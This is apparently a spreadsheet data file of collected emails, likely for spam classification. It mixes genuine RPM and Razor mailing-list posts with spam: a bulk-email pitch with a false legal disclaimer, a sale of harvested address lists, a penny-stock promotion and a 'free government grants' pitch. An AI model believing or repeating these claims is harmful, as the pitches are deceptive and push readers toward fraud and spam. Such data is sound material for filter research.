                 Thank You and we apologize for ANY inconvenience.&lt;/font&gt;&lt;/=
 font&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">(See Disclaimer below)
 Dear Internet Marketers,
 Explode YOUR Sales OVERNIGHT Guanranteed!!!! 
 Introducing YOU The Worlds Easiest, Most Powerful Blasting System!
 Absolutely Hands FREE! Set it up and Forget it for LIFE!
 Blast your sales in to a raging frenzy overnight!! Email your solo ad to over  
 6.5 million opt-in prospects and GROWING daily "100% hands FREE for LIFE!" 
 YOU have the ability to reach over 2 billion (2,000,000,000) opt-in targeted 
 prospects a year "100% AUTOMATICALLY!!" Just Imagine what that will do 
 to your cashflow?! The possibilities are unlimited! No more yahoo or topica these 
 are real membership bases waiting for your solo ad right NOW!! No more being 
 burned for spam, receiving flames, getting shutdown, people threatening your 
 livelihood this is just pure opt-in profits sent through our 100% automated server 
 via our auto cutting edge bots!!, put your promotional campaign in to full blown 
 automation with the worlds first Online blaster that adapts "set and forget" technology!! 
 Simply set and forget then watch your sales Explode by 3,100% OVERNIGHT!! 
 "guaranteed"!! GO NOW!! 
 PLUS WE WILL ALSO PROVIDE YOU WITH:
 An FFA, classified and 2 safelist scripts!!
 The ability to blast your ad to 2,100,000+ ezine subscribers!!
 Entry in to 3 members only safelists! 
 10,400+ free guaranteed visitors to your site!!
 Access to 2,300+ free web-based safelists! 
 A tool which guarantees you a never-ending stream of traffic!!
 Special spy tools that will enable you to spy on your competition!
 56,000+ exploding ebooks and reports!
 A submission service to over 400,000+ search engines!
 The greatest press release blaster on the internet!
 2 free lifetime ads in the members area!
 6,500+ of the most potent submission tools on the net! 
 A submission service to over 12,000,000+ Sites Daily!!
 The most hightech autoresponder ever invented!!
 35,000+ free banner impressions!!
 2 free multi URL tracking services that will track almost anything!!  
 Plus 9 Additional Free Bonuses! So what are YOU waiting for? 
 Send blank email NOW to hu_power10@yahoo.com with a word
 "Yes! Send it NOW Please"  in the subject field.
 (((((((((((((((( DOUBLE THE SPEED OF YOUR PC ))))))))))))))))))))
                             The Insider PC Secrets
 Learn exactly how to get more speed and efficiency out 
 of your PC without spending a single cent on hardware!
 ((((((((((((((((( DOUBLE THE SPEED OF YOUR PC )))))))))))))))))))
 #########################################
 Get the cheapest Web Host in town for only $35 per year!
                            PLUS
 Get your FREE email software NOW!
 #########################################
 @@@@@@@@@@@@@@  DISCLAIMER @@@@@@@@@@@@
 You are receiving this message for one of the following reasons: 
 1) we are on the same opt-in list; 
 2) you posted to one of my FFA pages; 
 3) you have responded to one of my ads; 
 4) you have sent an e-mail to one my addresses 
 5) you visited one of my sites 
 By doing so, you have agreed to receive this message. Under Bill s. 
 l6l8 TITLE III passed by the 105th US Congress this letter Cannot be 
 considered Spam as long as the sender includes contact information &amp; 
 a method of "removal." However this is a one time mailing so there's no 
 removal required. Thank you for your kind consideration. 
 @@@@@@@@@@@@@@ DISCLAIMER @@@@@@@@@@@@@
</t>
  </si>
  <si>
    <t xml:space="preserve">Well, thanks everyone for the explanations. I still disagree with the 
 reasoning, but it seems this is one of those philosophical questions 
 that I'm on the losing end of :)
 The checkinstall utility that someone mentioned seems useful, but I 
 don't really have the time to figure it out right now. After searching 
 the web some more, I found out that Mandrake's version of rpm is 
 patched to support what I wanted. So I guess I'll look into that when 
 I get a chance.
 On Thu, Aug 15, 2002 at 05:14:47PM +0200, Ralf Ertzinger wrote:
 &gt; Do nothing in the %build section, and copy the existing binaries
 &gt; in %install.
 As far as I can tell, this could be useful for my situation too. It's 
 not a complete solution since I can't really distribute the SRPMS with 
 full certainty that they work, but at least I can make RPMS for local 
 use by tarring up the buildroot directory and then using the above 
 technique. All I really want is to get dependency tracking for 
 everything installed on my system (including software from cvs). This 
 just makes it a little bit faster.
 gary
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: #$ Highly Targeted Email List!
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Consumers, Increase your Business Sales! 
 How??
 By targeting millions of buyers via e-mail !! 
 25 MILLION EMAILS + Bulk Mailing Software For Only $150.00
 super low price! ACT NOW !!!
 Our Fresh Addresses Will Bring You 
 Incredible Results!
 If you REALLY want to get the word out regarding
 your services or products, Bulk Email is the BEST 
 way to do so, PERIOD! Advertising in newsgroups is 
 good but you're competing with hundreds even THOUSANDS
 of other ads. Will your customer's see YOUR ad in the 
 midst of all the others?
 Free Classifieds? (Don't work)
 Web Site? (Takes thousands of visitors)
 Banners? (Expensive and iffy)
 E-Zine? (They better have a huge list)
 Search Engines? (Easily buried with thousands of others)
 Bulk Email will allow you to DIRECTLY contact your
 potential customers. They are much more likely to
 take the time to read about what you have to offer 
 if it was as easy as reading it via email rather
 than searching through countless postings in 
 newsgroups.
 The list's are divided into groups and are compressed. 
 This will allow you to use the names right off the cd. 
 ORDER IN THE NEXT 72 hours AND RECIEVE 4 BONUSES!!
 ORDER IN THE NEXT 48 HOURS AND RECIEVE FULL TECHNICAL SUPPORT !!!
 ACT NOW !!!!!!!!!!!!!!
 *BONUS #1 Receive an additional cd-rom with millions of fresh, 
 deliverable general internet e-mail addresses free!! 
 *BONUS #2 Receive 2000 how to books, reports and manuals on cd-rom with
 reprint resale rights! Produce for pennies and resell for BIG dollars! 
 *BONUS #3 Receive the Mass Mailer bulk delivery software, with full
 operating instructions. This software will get the mail out QUICK! 
 *BONUS #4 Receive the Informational Guide to bulk e-mail. This guide 
 will give you all the information you need to get started! 
 THIS IS A ONE TIME PACKAGE DEAL WORTH HUNDREDS OF DOLLARS!! 
 ACT NOW! THIS IS A LIMITED TIME OFFER! ORDER WHILE SUPPLIES LAST! 
 RECEIVE THIS DREAM PACKAGE FOR THE UNBELIEVABLE LOW, LOW PRICE OF 
 ONLY $150.00
 ORDERING INFORMATION:
 CHECK BY FAX SERVICES OR CREDIT CARD INFO: 
 O R D E R N O W . . . SAME DAY SERVICE (M-F) if your order
 is received before 3pm Central . To place an order, you can call us at: 
 1-308-650-5905 ext 121 Are fax your order to 1-415-873-2700 
 This Number is for credit Card Orders Only!!!
 CHECK BY FAX SERVICES!
 __________________________________________
 To order, via credit card simply cut/paste and print out the
 EZ ORDER FORM below and fax to our office today.
 ***** NOW ONLY $150! *****
 This "Special Price" is in effect for the next seven days,
 after that we go back to our regular price of $250.00 ...
 Don't delay... you can be in business tomorrow! 
 We accept Visa, Mastercard, Amex, Disc and Checks by Fax.
 ----------------------Cut &amp; Paste----------------------
 ---------------------EZ Order Form---------------------
 _____Yes! I want everything! I am ordering within 72 hours.
 Include my FREE "Business On A Disk" bonus along with your 
 Millions of E-Mail addresses on CD (plus 1,093,808 bonus addresses)
 for the special price of only $150.00 + shipping as indicated
 below.
 _____Yes! I missed the 72 hour special, but I am ordering
 CD WITH, super clean e-mail addresses within 7 days for the
 "special" price of only $250.00 + s&amp;h.
 _____Oop's I missed the 72 hour and 7 day "specials". I am
 ordering The Cd at the regular price of $250.00 + s&amp;h.
 ***PLEASE SELECT YOUR SHIPPING OPTION***
 ____I would like to receive my package FedEx OVERNIGHT. I am
 including $15 for shipping. (Hawaii &amp; Alaska $20 - Canada $25,
 all other International add an *additional* $25 [$40 total] for shipping)
 ____I would like to receive my package FedEx 2 DAY delivery.
 I'm including $10 for shipping. (Sorry no Canada or International
 delivery - Continental U.S. shipping addresses only)
 ***Please Print Carefully***
 NOTE: Orders cannot be shipped without complete information
 including your signature. No exceptions!
 NAME____________________________________________________
 COMPANY NAME____________________________________________
 ADDRESS_________________________________________________
 (FedEx can only ship to street addresses - no P.O. boxes)
 CITY, STATE, ZIP________________________________________
 PHONE NUMBER____________________________________________
 (required for shipping &amp; tracking) 
 EMAIL ADDRESS___________________________________________
 (Print Carefully - required in case we have a question and to
 send you a confirmation that your order has been shipped and for 
 technical support if you order within 24 hrs) 
 TYPE OF CREDIT CARD:
 ______VISA _____MASTERCARD ______AMEX ______DISC
 CREDIT CARD# __________________________________________
 EXPIRATION DATE________________________________________
 NAME ON CARD___________________________________________
 TOTAL AMOUNT (Including Shipping): $___________________
 DATE:x__________________
 (Required) SIGNATURE:x_________________________________
 I understand that I am purchasing the e-mail address on CD,
 and authorize the above charge to my credit card, the addresses are not rented, 
 but are mine to use for my own mailing, over-and-over. Free bonuses are included, 
 but cannot be considered part of the financial transaction. I understand that it 
 is my responsibility to comply with any laws applicable to my local area. As with 
 all software, once opened the CD may not be returned, however, if found defective 
 it will be replaced with like product at no charge.
 O R D E R N O W . . . SAME DAY SERVICE (M-F) if your order
 is received before 3pm Central . To place an order, you can call us at: 
 1-308-650-5905 ext 121 Are fax your order to1-415-873-2700 
 This Number is for credit Card Orders Only!!!
 CHECK BY FAX SERVICES!
 If you would like to fax a check, paste your check below and fax it to our office 
 along with the EZ Order Form forms to: 1-415-873-2700 
 **********************************************************
 ***24 HOUR FAX SERVICES*** PLEASE PASTE YOUR
 CHECK HERE AND FAX IT TO US AT 1-415-873-2700 
 **********************************************************
 If You fax a check, there is no need for you to mail the
 original. We will draft a new check, with the exact
 information from your original check. All checks will be
 held for bank clearance. (7-10 days) Make payable to: 
 "S.C.I.S"
 -=-=-=-=--=-=-=-=-=-=-=offlist  Instructions=-=-=-=-=-=-=-=-=-=-=-=
 **************************************************************
 Do not reply to this message - 
 mailto:heidilee2003@excite.com?Subject=offnow
 **************************************************************
 1365fIFR5-655xnXn0181osWS3-239l28
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Razor-users] Re: Reporting: connection refused
</t>
  </si>
  <si>
    <t xml:space="preserve">  You should not be reporting spam to 64.90.187.2 (apt).
   You need to report only to nomination servers, which, like
   catalogue servers, can and will be changed, and are
   set by the discovery servers.  Razor agents do discovery
   for you automatically, storing server names in .razor/*.lst files
   -chad
 On 10/08/02 10:48 +0530, Raghavendra Bhat wrote:
 ) Hello List:
 ) 
 ) I have been  using Razor for quite a while.  I  have been reporting spam
 ) to the server at 64.90.187.2 from mutt.
 ) 
 ) I am  unable to report as  of the past  two days.  The message  which is
 ) echoed back says 'Connection refused'.
 ) 
 ) Am I  doing some brain  dead thing ?   If not are there  other reporting
 ) servers ?
 ) 
 ) -- 
 ) ragOO, VU2RGU&lt;-&gt;http://gnuhead.dyndns.org/&lt;-&gt;GPG: 1024D/F1624A6E     
 )        Helping to keep the  Air-Waves FREE         Amateur Radio
 )        Helping to keep your Software  FREE       the GNU Project          
 )        Helping to keep the  W W W     FREE  Debian GNU/${kernel}
 ) 
 ) 
 ) -------------------------------------------------------
 ) This sf.net email is sponsored by:ThinkGeek
 ) Welcome to geek heaven.
 ) http://thinkgeek.com/sf
 ) _______________________________________________
 ) Razor-users mailing list
 ) Razor-users@lists.sourceforge.net
 ) https://lists.sourceforge.net/lists/listinfo/razor-users
 -------------------------------------------------------
 This sf.net email is sponsored by: Dice - The leading online job board
 for high-tech professionals. Search and apply for tech jobs today!
 http://seeker.dice.com/seeker.epl?rel_code=31
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Best news yet
</t>
  </si>
  <si>
    <t xml:space="preserve">INVESTMENT SCHOLARS CLUB- bringing you the latest from the financial epicenter. 
 Research Alert - Undervalued
 August 26, 2002
 XrayMedia
 (OTCBB: XRMD) Alert Rating = 8
 Congratulations to our subscribers who moved in fast on our last report! 
 Pick #1 - Internet incubator giant CMGI has paid off very well, up over 150% on major volume and great news.
 Pick #2 - ENBC Began its' heavy move up over 200% hitting a high of over 300%... 
 Our Latest Discovery: XRMD - Several investment reporters featured XrayMedia during fiscal 2001/02. At the time, we felt that the advertising industry created a huge opportunity for the company's direct sourcing technology solutions, and so far the company has delivered. Although the company has raised just $2 million in the two years it has been developing its technology, it has increased revenues sources dramatically by opening a financial services division expanding the Live Media Marketplace expected revenues to $3-5 mm during fiscal 2003, driving the line in 2004 to $15- 25 mm. This remarkable growth becomes more understandable when one views the savings that its direct sourcing model generates for advertisers and retailers. The company saves advertising buyers up to 70% in costs dramatically increasing wholesale pricing effect, by saving time &amp; efforts, cutting telephone and faxing bills, while providing free mass sourcing opportunities for negotiating advertising buying and selling opportunities using a secure state of the art real time negotiating technology over the Internet, weve never seen anything like it!
 How does the company do this? 
 XrayMedia (OTCBB: XRMD) The Company founded XrayMedia in March 2000 to create a "mass source to advertising sector " live negotiating technology and advertising purchase financing accents the companys strengths, serving both large and small United States and International customers with advertising opportunities delivered directly from the media and the general public. *** With the use of proprietary software, it is providing sophistication to this industry which greatly expedites orders and finds opportunities based on the users criteria which results in a savings to the advertising buyers and as well as the ad sellers which it serves. 
 Their "source to business model", eliminates two levels of hindrance (sourcing and limited opportunities) and provides its customers with mass advertising choices and live negotiating that is designed give a substantially low cost base for finding the right advertising opportunity for all business with no cost.
 While investors have thrown money recklessly at money-losing technology companies, here is a company that will increase revenues from $1 to $25 million in three years, and grow profitability substantially with little funding. XrayMedia is among the best performing sectors since September 11th, and we feel that XrayMedia is likely to break through its 52-week high of $00.19 soon.
  *** Listed on the OTCBB and trading with an extremely low market valuation under 10 mm.
 *** It has opened accounts with over hundreds of buyers and sellers including some of the largest media buyers in the world, major retailers and smaller retailers. 
 *** Attracting interest of major investment bankers and analysts, also a possible acquisition target at some point by major retailers.
 *** Received largest order of advertising financing over $500k with more contracts accumulating.
 *** Revenue growth is expected to be dramatic $1mm to $5mm. 
 *** The company is expected to report a profitable quarter, to grow revenues and earnings "substantially" when it begins its 2003 fiscal year in January.
 Shares Outstanding:      	83 mm
 Float:                         	5  mm
 Recent Price:               	$00.08
 Year Low/High:            	$00.02 - $00.19
 18-Month Target Price:  	$5.00+
 Company Contact: Ray Dabney 
 Toll free:  1(888) 777-0658     
 (h3)6926Zjpl7
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Complimentary Thermal Coffeemaker from Gevalia!
</t>
  </si>
  <si>
    <t xml:space="preserve">------000000000000000000000000000000000000000000000000000000000000000
 Content-Type: text/plain; charset="us-ascii"
 Content-Transfer-Encoding: 7bit
 Good news!  As someone who is interested in receiving offers, 
 you'll now begin to receive exclusive deals from Consumer Today.  
 If you have any questions or would like not to receive our great 
 offers, please follow our easy unsubscribe process below.  Welcome 
 and we look forward to serving you!
 **************************************************************
 Taste two 1/2-lb. varieties of Gevalia Kaffe and we'll 
 send you an 8-cup Thermal Coffeemaker as your FREE GIFT.
 http://ct2.consumertoday.net/cgi-bin14/flo?y=mD30CCzME0D40Dy0BI
 All of this can be yours for only $14.95
  * Two 1/2-lb. Packages of Gevalia Coffee 
  * Our 8-cup Thermal Coffeemaker FREE
  * Gevalia Gift Catalog
 Total Retail Value of This Special Offer $80
 A special offer for the discriminating coffee drinker.
 http://ct2.consumertoday.net/cgi-bin14/flo?y=mD30CCzME0D40Dy0BI
 Indulge your passion for coffee. Select two 1/2-lb. 
 packages of smooth, aromatic Gevalia Kaffe for only 
 $14.95, including shipping and handling, and we'll 
 deliver them to your door with an 8-cup Thermal 
 Coffeemaker (retail value of $80) as a FREE GIFT. 
 With this machine, coffee is brewed directly into 
 its own thermal carafe and stays hot and flavorful 
 for hours.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;/head&gt;
 &lt;center&gt;
 &lt;h1&gt;
 &lt;b&gt;&lt;font face="Arial Black"&gt;&lt;font color="#0000FF"&gt;&lt;font size=+2&gt;&amp;nbsp;
 Free Personal and Business Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h1&gt;&lt;/center&gt;
 &lt;p&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER=0 CELLSPACING=0 CELLPADDING=10 WIDTH="419" BGCOLOR="#0000FF" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="397" BGCOLOR="#FFFF00"&gt;
 &lt;center&gt;
 &lt;h2&gt;
 &lt;font face="Arial Narrow"&gt;" Qualify for &lt;u&gt;at least&lt;/u&gt; $25,000 in free
 grants money - Guaranteed! "&lt;/font&gt;&lt;/h2&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;font face="Arial"&gt;&lt;font size=+0&gt;Each day over One Million Dollars in Free
 Government&lt;br&gt;
 Grants&amp;nbsp; is given away to people just like you for a wide&lt;br&gt;
 variety of Business And Personal Needs&lt;/font&gt;&lt;/font&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 Dear Grant Seeker,&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In a moment, I'll tell you
 exactly &lt;b&gt;HOW &amp;amp; WHERE&lt;/b&gt; to get Grants. This &lt;b&gt;MONEY&lt;/b&gt; has to
 be given away, &lt;b&gt;WHY&lt;/b&gt; not to &lt;b&gt;YOU?&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You may be thinking, "How
 can I get some of this Free Grants Money"&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Maybe you think it's impossible
 to get free money?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Let me tell you it's not
 impossible! It's a fact, ordinary people and businesses all across the
 United States are receiving millions of dollars from these Government and
 Private Foundation's everyday.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Who Can Apply?&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;ANYONE&lt;/b&gt; can apply
 for a Grant from 18 years old and up!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grants from $500.00 to $50,000.00
 are possible! &lt;b&gt;GRANTS&lt;/b&gt; don't have to be paid back,
 &lt;b&gt;EVER! &lt;/b&gt;Claim
 your slice of the &lt;b&gt;FREE&lt;/b&gt; American Pie.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This money is not a loan,
 Trying to get money through a conventional bank can be very time consuming
 and requires a lot of paperwork, only to find out that you've been denied.
 These Government Agencies don't have to operate under the same stringent
 requirements that banks do.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;You decide how much money
 you need, as long as it's a lawful amount and meets with the Government
 Agencies criteria, the money is yours to keep and never has to be repaid.
 This money is non taxable &amp;amp; interest free.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;None of these programs require
 a credit check, collateral, security deposits or co-signers, you can apply
 even if you have a bankruptcy or bad credit, it doesn't matter, you as
 a tax payer and U.S. citizen are entitled to this money.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;There are currently over
 1,400 Federal Programs, 24,000 State Programs, 30,000 Private Foundations
 and 20,000 Scholarship Programs available.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This year over $30 Billion
 Dollars In Free personal and business Government Grants Money will be given
 away by Government Grants Agencies.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;center&gt;&lt;table BORDER CELLSPACING=0 CELLPADDING=3 WIDTH="80%" BORDERCOLOR="#ffcc66" &gt;
 &lt;tr&gt;
 &lt;td WIDTH="100%"&gt;
 &lt;center&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;&lt;font size=+0&gt;Government Personal
 and Business Grants Facts:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over 20 Million People Get Government
 Money Every Year:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;1,000,000 entrepreneurs get money
 to start or expand a business&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;4,000,000 people get money to invest
 in real estate&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;6,000,000 people get money to go
 to college&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;10,000,000 people get free help and
 training for a better job&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Getting Business
 Grants&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Anyone thinking about going
 into business for themselves, or wanting to expand an existing business
 should rush for the world's largest "one-stop-money-shop" where FREE business
 grants to start or expand a business is being held for you by the Federal
 Government.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;It
 sounds absolutely incredible that people living right here in the United
 States of America wouldn't know that each year the world's largest source
 of free business help delivers:&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;ul&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Over $30 billion dollars in free
 business grants and low-interest loans;&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over one-half trillion dollars in
 procurement contracts; and&lt;/font&gt;&lt;/font&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;over $32 billion dollars in FREE
 consulting and research grants.&lt;/font&gt;&lt;/font&gt;&lt;/ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;With an economy that remains
 unpredictable, and a need for even greater economic development on all
 fronts, the federal government is more willing than it ever has been before
 to give you the money you need to own your own business and become your
 own boss!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;In
 spite of the perception that people should not look to the government for
 help, the great government give-away programs have remained so incredibly
 huge that if each of the approximately 8 million businesses applied for
 an equal share, they would each receive over $70,000.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;div STYLE="margin-left: 1cm; margin-right: 1cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Most
 people never apply for FREE Business Grants because they somehow feel it
 isn't for them, feel there's too much red-tape, or simply don't know who
 to contact.The fact is, however, that people from all walks of life do
 receive FREE GRANTS MONEY and other benefits from the government, and you
 should also.&lt;/font&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;h2&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Government Grants
 for Personal Need&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Help to buy a new home for
 low income families, repair your home, rent, mortgage payments, utility
 bills, purchase a new car, groceries, childcare, fuel, general living expenses,
 academic tutoring, clothing, school supplies, housing assistance, legal
 services, summer camp, debts, music lessons, art lessons, any extracurricular
 activities, pay bills for senior citizens, real estate taxes, medical expenses
 and general welfare. If you or someone you know suffered a fire lose there
 are programs available to help in replacing necessities.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h2&gt;
 &lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Scholarships And
 Grants For Education&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/h2&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Grant Money for preschool
 children and nursery school education, private, primary and secondary schools,
 men and women to further their education, scholarships for athlete's, business
 management, engineering, computer science, medical school, undergraduate,
 graduate, professional, foreign studies and many more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;h3&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;&lt;font size=+0&gt;Here's How You
 Can Get Free Grants&lt;br&gt;
 In The Shortest Time Possible&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Once you know how and where
 to apply for a specific Free Grant, results are almost inevitable. The
 government wants to give away this money. . . it is under congressional
 mandate to do so! These funds are made available to help you, the tax payer.
 All that's required from you is the proper presentation of your grant request.
 That's all.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;Announcing...&lt;/font&gt;&lt;/font&gt;
 &lt;center&gt;
 &lt;h3 STYLE="margin-left: 1cm; margin-right: 1cm; margin-top: 0cm"&gt;
 &lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#CC0000"&gt;&lt;font size=-1&gt;"The Complete
 Guide To Government Grants"&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/h3&gt;&lt;/center&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Forget just about everything
 you've seen or heard about government grants. What I've done is put together
 a complete blueprint for researching, locating and obtaining government
 grants. "The Complete Guide To Government Grants" is the most comprehensive
 tool for obtaining free grant money, and it comes in an Electronic book&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;(e-book) format, meaning you can
 download and start using it minutes after you order.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Complete Guide to Government Grants will provide you with access to thousands
 of grant and loan sources, with step by step instructions to proposal writing
 and contact procedures.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;In the Complete Guide to Government
 Grants you'll find:&lt;/font&gt;&lt;/font&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Step by step guidelines
 to applying for government grants&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to over 1,400
 grant, loan and assistance programs offered by the U.S. federal government.
 All you need to do is Click &amp;amp; Find your program from the detailed categorized
 listings&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Direct access to thousands
 of resources of state specific grant programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Name, phone number and address
 of an expert in your state that will answer your grant related questions
 and help you with the grant application... free of charge&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online directory of government
 supported venture capital firms&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A unique search tool that
 will allow you to generate a customized listing of recently announced grant
 programs&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Government funding programs
 for small businesses&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Top 100 government programs
 (based on number of inquiries), discover what are the most sought after
 government grants and assistant programs. Claim your slice of the &lt;b&gt;FREE&lt;/b&gt;
 American Pie&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Online Directory of federal
 and state resources for government scholarships and grants for education&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
